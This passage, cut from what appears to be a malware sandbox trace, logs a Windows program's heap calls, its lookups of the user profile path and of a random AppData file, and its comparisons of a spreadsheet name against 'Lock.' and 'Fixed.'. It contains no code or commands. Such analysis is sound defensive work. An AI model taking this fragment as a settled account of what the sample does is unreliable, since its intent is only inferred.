dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0150.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.016] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0150.017] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0150.017] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0150.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0150.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0150.018] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/rCxPhCicoc5u7sEbYlz.ots", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\rCxPhCicoc5u7sEbYlz.ots", lpFilePart=0x8cf650*="rCxPhCicoc5u7sEbYlz.ots") returned 0x37 [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0150.018] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\rCxPhCicoc5u7sEbYlz.ots" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\rcxphcicoc5u7sebylz.ots")) returned 0xffffffff [0150.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0150.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0150.019] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0150.019] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.019] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0150.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0150.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0150.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0150.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0150.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0150.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s4dSYQJ4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4dSYQJ4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dSYQJ4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYQJ4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YQJ4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QJ4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0150.020] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77f30 [0150.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0150.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s4dSYQJ4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4dSYQJ4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dSYQJ4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYQJ4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YQJ4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QJ4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0150.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.021] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0150.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0150.021] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0150.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0150.022] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0150.022] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0150.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0150.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0150.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0150.024] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0150.024] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | 